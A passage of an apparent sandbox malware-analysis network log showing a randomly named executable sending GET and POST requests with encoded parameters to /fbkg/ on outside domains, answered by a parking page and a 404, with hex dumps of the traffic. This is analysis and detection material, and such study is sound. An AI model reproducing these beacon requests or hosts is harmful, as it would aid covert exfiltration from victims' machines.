                                                                                                                                                                                                Data Ascii: 2969<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.lets-room.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg.ru" rel="nofollow noopener noreferrer" target="_blank">.</a></div><div class="b-page__content-wrapper b-page__cont
                                                                                                                                                                                                Nov 17, 2023 19:29:26.939502001 CET655INData Raw: 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 2d 73 74 61 74 69 63 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                Data Ascii: ent-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.lets-room.online</h1><p class="b-parking__header-description b-text">
                                                                                                                                                                                                Nov 17, 2023 19:29:26.939882994 CET656INData Raw: 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 74 65 6d 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 2d 6f 76 65 72 61 6c 6c 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 68 65 61 64 65 72 22 3e 3c
                                                                                                                                                                                                Data Ascii: b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact
                                                                                                                                                                                                Nov 17, 2023 19:29:26.943531036 CET658INData Raw: 72 67 65 2d 63 6f 6d 70 61 63 74 22 3e d0 93 d0 be d1 82 d0 be d0 b2 d1 8b d0 b5 20 d1 80 d0 b5 d1 88 d0 b5 d0 bd d0 b8 d1 8f 20 d0 bd d0 b0 26 6e 62 73 70 3b 43 4d 53 3c 2f 73 74 72 6f 6e 67 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 74 65 78 74 20
                                                                                                                                                                                                Data Ascii: rge-compact"> &nbsp;CMS</strong><p class="b-text b-parking__promo-description"> &nbsp;CMS &nbsp;
                                                                                                                                                                                                Nov 17, 2023 19:29:26.943624973 CET659INData Raw: 74 65 78 74 2d 73 69 7a 65 5f 6e 6f 72 6d 61 6c 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77
                                                                                                                                                                                                Data Ascii: text-size_normal b-parking__button b-parking__button_type_hosting" href="https://www.reg.ru/hosting/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_land_host&amp;reg_source=parking_auto"> </a><p c
                                                                                                                                                                                                Nov 17, 2023 19:29:26.943691969 CET660INData Raw: 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 62 75 69 6c 64 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f 61 75 74 6f 22 3e d0 97 d0 b0 d0 ba d0 b0 d0 b7 d0 b0 d1 82 d1 8c 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61
                                                                                                                                                                                                Data Ascii: paign=s_land_build&amp;reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__ssl-protection"><span class="b-parking__promo-image b-parking__promo-image_type_ssl l-margin_right-large"></span> <strong cl
                                                                                                                                                                                                Nov 17, 2023 19:29:26.943808079 CET662INData Raw: 3e 3c 2f 61 72 74 69 63 6c 65 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72
                                                                                                                                                                                                Data Ascii: ></article><script onload="window.trackScriptLoad('parking-rdap-auto.js')" onerror="window.trackScriptLoad('parking-rdap-auto.js', 1)" src="parking-rdap-auto.js" charset="utf-8"></script><script>function ondata(data){ if ( data.err
                                                                                                                                                                                                Nov 17, 2023 19:29:26.944046021 CET663INData Raw: 75 6e 79 2c 20 73 70 61 6e 2e 6e 6f 2d 70 75 6e 79 27 20 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 20 3d 20 27 74 65 78 74 43 6f 6e 74 65 6e 74 27 20 69 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 20 3f 20 27 74 65 78 74 43 6f 6e 74 65 6e
                                                                                                                                                                                                Data Ascii: uny, span.no-puny' ), t = 'textContent' in document.body ? 'textContent' : 'innerText'; var domainName = document.title.match( /(xn--|[0-9]).+\.(xn--)[^\s]+/ )[0]; if ( domainName ) { var domainNameUni
                                                                                                                                                                                                Nov 17, 2023 19:29:26.944113016 CET664INData Raw: 74 29 2c 61 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 74 29 5b 30 5d 2c 6b 2e 61 73 79 6e 63 3d 31 2c 6b 2e 73 72 63 3d 72 2c 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6b 2c 61 29
                                                                                                                                                                                                Data Ascii: t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)}) (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym"); ym(54200914, "init", { clickmap:true, trackLinks:true, accurat


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                26192.168.11.2050153194.58.112.17480C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:29:26.724462986 CET652OUTGET /fbkg/?T6I=1e2gHfHHru8C8drNoa5nQ+ppQcfOtPpy/tqqaGYFPoE7F/MNi+0XBdtoIJB4HFmIBuT2tqcIait1CoK9oXPorw0w8HqvZiCD5A==&Nx1L1=526dgl_phJ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.lets-room.online
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:29:26.938961983 CET654INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:29:26 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 32 39 36 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 6c 65 74 73 2d 72 6f 6f 6d 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd 20 d0 b2 26 6e 62 73 70 3b 3c 61 20 63 6c 61 73 73 3d 22 62 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 67 2e 72 75 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 20 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e d0 a0 d0 b5 d0 b3 2e d1 80 d1 83 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74
                                                                                                                                                                                                Data Ascii: 2969<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.lets-room.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg.ru" rel="nofollow noopener noreferrer" target="_blank">.</a></div><div class="b-page__content-wrapper b-page__cont
                                                                                                                                                                                                Nov 17, 2023 19:29:26.939502001 CET655INData Raw: 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 2d 73 74 61 74 69 63 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                Data Ascii: ent-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.lets-room.online</h1><p class="b-parking__header-description b-text">
                                                                                                                                                                                                Nov 17, 2023 19:29:26.939882994 CET656INData Raw: 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 74 65 6d 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 2d 6f 76 65 72 61 6c 6c 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 68 65 61 64 65 72 22 3e 3c
                                                                                                                                                                                                Data Ascii: b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact
                                                                                                                                                                                                Nov 17, 2023 19:29:26.943531036 CET658INData Raw: 72 67 65 2d 63 6f 6d 70 61 63 74 22 3e d0 93 d0 be d1 82 d0 be d0 b2 d1 8b d0 b5 20 d1 80 d0 b5 d1 88 d0 b5 d0 bd d0 b8 d1 8f 20 d0 bd d0 b0 26 6e 62 73 70 3b 43 4d 53 3c 2f 73 74 72 6f 6e 67 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 74 65 78 74 20
                                                                                                                                                                                                Data Ascii: rge-compact"> &nbsp;CMS</strong><p class="b-text b-parking__promo-description"> &nbsp;CMS &nbsp;
                                                                                                                                                                                                Nov 17, 2023 19:29:26.943624973 CET659INData Raw: 74 65 78 74 2d 73 69 7a 65 5f 6e 6f 72 6d 61 6c 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77
                                                                                                                                                                                                Data Ascii: text-size_normal b-parking__button b-parking__button_type_hosting" href="https://www.reg.ru/hosting/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_land_host&amp;reg_source=parking_auto"> </a><p c
                                                                                                                                                                                                Nov 17, 2023 19:29:26.943691969 CET660INData Raw: 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 62 75 69 6c 64 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f 61 75 74 6f 22 3e d0 97 d0 b0 d0 ba d0 b0 d0 b7 d0 b0 d1 82 d1 8c 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61
                                                                                                                                                                                                Data Ascii: paign=s_land_build&amp;reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__ssl-protection"><span class="b-parking__promo-image b-parking__promo-image_type_ssl l-margin_right-large"></span> <strong cl
                                                                                                                                                                                                Nov 17, 2023 19:29:26.943808079 CET662INData Raw: 3e 3c 2f 61 72 74 69 63 6c 65 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72
                                                                                                                                                                                                Data Ascii: ></article><script onload="window.trackScriptLoad('parking-rdap-auto.js')" onerror="window.trackScriptLoad('parking-rdap-auto.js', 1)" src="parking-rdap-auto.js" charset="utf-8"></script><script>function ondata(data){ if ( data.err
                                                                                                                                                                                                Nov 17, 2023 19:29:26.944046021 CET663INData Raw: 75 6e 79 2c 20 73 70 61 6e 2e 6e 6f 2d 70 75 6e 79 27 20 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 20 3d 20 27 74 65 78 74 43 6f 6e 74 65 6e 74 27 20 69 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 20 3f 20 27 74 65 78 74 43 6f 6e 74 65 6e
                                                                                                                                                                                                Data Ascii: uny, span.no-puny' ), t = 'textContent' in document.body ? 'textContent' : 'innerText'; var domainName = document.title.match( /(xn--|[0-9]).+\.(xn--)[^\s]+/ )[0]; if ( domainName ) { var domainNameUni
                                                                                                                                                                                                Nov 17, 2023 19:29:26.944113016 CET664INData Raw: 74 29 2c 61 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 74 29 5b 30 5d 2c 6b 2e 61 73 79 6e 63 3d 31 2c 6b 2e 73 72 63 3d 72 2c 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6b 2c 61 29
                                                                                                                                                                                                Data Ascii: t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)}) (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym"); ym(54200914, "init", { clickmap:true, trackLinks:true, accurat


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                27192.168.11.2050154198.177.123.10680C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:29:32.228758097 CET665OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.visionquestengage.life
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.visionquestengage.life
                                                                                                                                                                                                Referer: http://www.visionquestengage.life/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 6b 31 32 51 68 6f 4c 7a 6a 63 6d 63 79 6c 59 39 6a 75 52 51 2f 6e 2f 6a 35 41 7a 4d 50 33 6c 79 7a 76 68 74 37 52 6a 62 68 2b 78 62 61 70 74 64 42 2b 45 79 74 79 62 43 67 64 42 70 30 53 71 36 4a 4e 53 66 35 65 59 74 31 2b 47 49 35 4a 44 37 6e 35 4d 41 74 53 34 59 52 75 79 62 51 6a 75 7a 75 75 6a 37 48 59 62 78 39 53 32 4e 41 53 77 66 36 38 67 41 4b 78 62 49 63 77 6b 70 4d 44 69 4f 33 72 4f 43 36 75 6d 78 6f 4f 35 7a 78 30 74 6f 37 41 77 59 63 70 50 2b 75 57 42 42 61 79 65 57 44 37 56 46 77 70 72 65 37 35 66 58 66 4d 32 75 77 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=Ck12QhoLzjcmcylY9juRQ/n/j5AzMP3lyzvht7Rjbh+xbaptdB+EytybCgdBp0Sq6JNSf5eYt1+GI5JD7n5MAtS4YRuybQjuzuuj7HYbx9S2NASwf68gAKxbIcwkpMDiO3rOC6umxoO5zx0to7AwYcpP+uWBBayeWD7VFwpre75fXfM2uw==
                                                                                                                                                                                                Nov 17, 2023 19:29:32.566328049 CET665INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:29:32 GMT
                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                27198.177.123.10680192.168.11.2050154C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:29:32.228758097 CET665OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.visionquestengage.life
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.visionquestengage.life
                                                                                                                                                                                                Referer: http://www.visionquestengage.life/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 6b 31 32 51 68 6f 4c 7a 6a 63 6d 63 79 6c 59 39 6a 75 52 51 2f 6e 2f 6a 35 41 7a 4d 50 33 6c 79 7a 76 68 74 37 52 6a 62 68 2b 78 62 61 70 74 64 42 2b 45 79 74 79 62 43 67 64 42 70 30 53 71 36 4a 4e 53 66 35 65 59 74 31 2b 47 49 35 4a 44 37 6e 35 4d 41 74 53 34 59 52 75 79 62 51 6a 75 7a 75 75 6a 37 48 59 62 78 39 53 32 4e 41 53 77 66 36 38 67 41 4b 78 62 49 63 77 6b 70 4d 44 69 4f 33 72 4f 43 36 75 6d 78 6f 4f 35 7a 78 30 74 6f 37 41 77 59 63 70 50 2b 75 57 42 42 61 79 65 57 44 37 56 46 77 70 72 65 37 35 66 58 66 4d 32 75 77 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=Ck12QhoLzjcmcylY9juRQ/n/j5AzMP3lyzvht7Rjbh+xbaptdB+EytybCgdBp0Sq6JNSf5eYt1+GI5JD7n5MAtS4YRuybQjuzuuj7HYbx9S2NASwf68gAKxbIcwkpMDiO3rOC6umxoO5zx0to7AwYcpP+uWBBayeWD7VFwpre75fXfM2uw==
                                                                                                                                                                                                Nov 17, 2023 19:29:32.566328049 CET665INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:29:32 GMT
                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


